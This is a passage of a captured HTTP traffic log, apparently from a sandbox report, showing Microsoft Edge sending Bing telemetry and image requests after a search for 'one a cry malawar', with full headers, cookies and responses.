%22%2C%22TS%22%3A1729199024967%2C%22Name%22%3A1263%2C%22FID%22%3A%22ViewPortWidth%22%7D%2C%7B%22T%22%3A%22CI.BNP%22%2C%22TS%22%3A1729199024967%2C%22Name%22%3A%22OfferIdMissing%22%2C%22FID%22%3A%22BNPOfferId%22%7D%2C%7B%22T%22%3A%22CI.EffectiveLocation%22%2C%22TS%22%3A1729199024967%2C%22Name%22%3A%22tryWriteEffectiveLocation%22%2C%22FID%22%3A%22EffectiveLocation%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malawar&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&aqs=edge..69i57.9328j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: SRCHUSR=DOB=20241017
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2230&DPR=1.0&UTC=0&PV=10.0
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:03:45 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199025.14910a65
GET

https://r.bing.com/rp/NbA_o5_JH0GEi8eQ-UOtARHo4pE.svg

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /rp/NbA_o5_JH0GEi8eQ-UOtARHo4pE.svg HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: SRCHUSR=DOB=20241017
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2230&DPR=1.0&UTC=0&PV=10.0
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:03:45 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199025.14910a64
GET

https://r.bing.com/rp/Dl3Mgy5b8mZk0rO25YbvLM3bp7Q.svg

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /rp/Dl3Mgy5b8mZk0rO25YbvLM3bp7Q.svg HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: SRCHUSR=DOB=20241017
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2230&DPR=1.0&UTC=0&PV=10.0
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:03:45 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199025.14910a66
GET

https://www.bing.com/fd/ls/l?IG=125258D7D1334F6085405077EDD48B89&CID=3038AD7D4D4F6C932B24B8664CD86DBE&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.EffectiveLocation%22%2C%22TS%22%3A1729199025155%2C%22Name%22%3A%22WriteEffectiveLocationSuccess%22%2C%22FID%22%3A%22EffectiveLocation%22%7D%5D

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /fd/ls/l?IG=125258D7D1334F6085405077EDD48B89&CID=3038AD7D4D4F6C932B24B8664CD86DBE&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.EffectiveLocation%22%2C%22TS%22%3A1729199025155%2C%22Name%22%3A%22WriteEffectiveLocationSuccess%22%2C%22FID%22%3A%22EffectiveLocation%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malawar&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&aqs=edge..69i57.9328j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: SRCHUSR=DOB=20241017
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2230&DPR=1.0&UTC=0&PV=10.0
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:03:46 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199026.14910c85
GET

https://www.bing.com/fd/ls/l?IG=125258D7D1334F6085405077EDD48B89&CID=3038AD7D4D4F6C932B24B8664CD86DBE&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.SERPSB%22,%22FID%22:%22CI%22,%22Name%22:%22CharCount%22,%22Text%22:%2217%22}]

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /fd/ls/l?IG=125258D7D1334F6085405077EDD48B89&CID=3038AD7D4D4F6C932B24B8664CD86DBE&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.SERPSB%22,%22FID%22:%22CI%22,%22Name%22:%22CharCount%22,%22Text%22:%2217%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malawar&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&aqs=edge..69i57.9328j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: SRCHUSR=DOB=20241017
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2230&DPR=1.0&UTC=0&PV=10.0
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:03:46 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199026.14910c84
GET

https://www.bing.com/fd/ls/l?IG=125258D7D1334F6085405077EDD48B89&CID=3038AD7D4D4F6C932B24B8664CD86DBE&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.SERPSB%22,%22FID%22:%22CI%22,%22Name%22:%22LandingRows%22,%22Text%22:%221%22}]

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /fd/ls/l?IG=125258D7D1334F6085405077EDD48B89&CID=3038AD7D4D4F6C932B24B8664CD86DBE&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.SERPSB%22,%22FID%22:%22CI%22,%22Name%22:%22LandingRows%22,%22Text%22:%221%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malawar&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&aqs=edge..69i57.9328j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: SRCHUSR=DOB=20241017
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2230&DPR=1.0&UTC=0&PV=10.0
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|

Response

HTTP/2.0 200

content-length: 17771
content-type: text/html; charset=utf-8
cache-control: private
content-encoding: gzip
vary: Accept-Encoding
x-eventid: 67117bb272e84b70a9ff952272d497b1
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-IhH8gJv5QZDuxZF23gwJNh7lzvUdg2NClX2Mb94Swfw='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Thu, 17 Oct 2024 21:03:46 GMT
set-cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2230&DPR=1.0&UTC=0&PV=10.0; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:46 GMT; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199026.14910cbc
GET

https://www.bing.com/images/sbi?mmasync=1&ig=125258D7D1334F6085405077EDD48B89&iid=.5099&ptn=Web&ep=0&iconpl=1

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /images/sbi?mmasync=1&ig=125258D7D1334F6085405077EDD48B89&iid=.5099&ptn=Web&ep=0&iconpl=1 HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=one+a+cry+malawar&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&aqs=edge..69i57.9328j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: SRCHUSR=DOB=20241017
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2230&DPR=1.0&UTC=0&PV=10.0
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:03:46 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199026.14910d27
GET

https://www.bing.com/fd/ls/l?IG=125258D7D1334F6085405077EDD48B89&CID=3038AD7D4D4F6C932B24B8664CD86DBE&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.HoverLink%22%2C%22TS%22%3A1729199025287%2C%22Name%22%3A%22Hover%22%2C%22FID%22%3A%22Original%22%7D%2C%7B%22Namespace%22%3A%22SearchHarder%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199025293%2C%22Name%22%3A%22ButtonHidden%22%2C%22FID%22%3A%22SearchHarderEntryPoint%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1729199025533%2C%22Name%22%3A%22OrgId%22%2C%22FID%22%3A%22NoSignInAttempt%22%7D%2C%7B%22Time%22%3A1710%2C%22time%22%3A1724%2C%22T%22%3A%22CI.Latency%22%2C%22TS%22%3A1729199025533%2C%22Name%22%3A%22Loaded%22%2C%22FID%22%3A%22HP%22%7D%5D

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /fd/ls/l?IG=125258D7D1334F6085405077EDD48B89&CID=3038AD7D4D4F6C932B24B8664CD86DBE&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.HoverLink%22%2C%22TS%22%3A1729199025287%2C%22Name%22%3A%22Hover%22%2C%22FID%22%3A%22Original%22%7D%2C%7B%22Namespace%22%3A%22SearchHarder%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199025293%2C%22Name%22%3A%22ButtonHidden%22%2C%22FID%22%3A%22SearchHarderEntryPoint%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1729199025533%2C%22Name%22%3A%22OrgId%22%2C%22FID%22%3A%22NoSignInAttempt%22%7D%2C%7B%22Time%22%3A1710%2C%22time%22%3A1724%2C%22T%22%3A%22CI.Latency%22%2C%22TS%22%3A1729199025533%2C%22Name%22%3A%22Loaded%22%2C%22FID%22%3A%22HP%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malawar&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&aqs=edge..69i57.9328j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2230&DPR=1.0&UTC=0&PV=10.0
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|
cookie: SRCHUSR=DOB=20241017&T=1729199024000

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:03:46 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199026.14910d44
GET

https://www.bing.com/fd/ls/l?IG=125258D7D1334F6085405077EDD48B89&CID=3038AD7D4D4F6C932B24B8664CD86DBE&TYPE=Event.ClientInst&DATA=%5B%7B%22comp%22%3A%22loaded%22%2C%22time%22%3A1730%2C%22T%22%3A%22CI.Data%22%2C%22TS%22%3A1729199025539%2C%22Name%22%3A%22speech%22%2C%22FID%22%3A%22HP%22%7D%5D

msedge.exe

Remote address:

92.123.128.172:443

Request

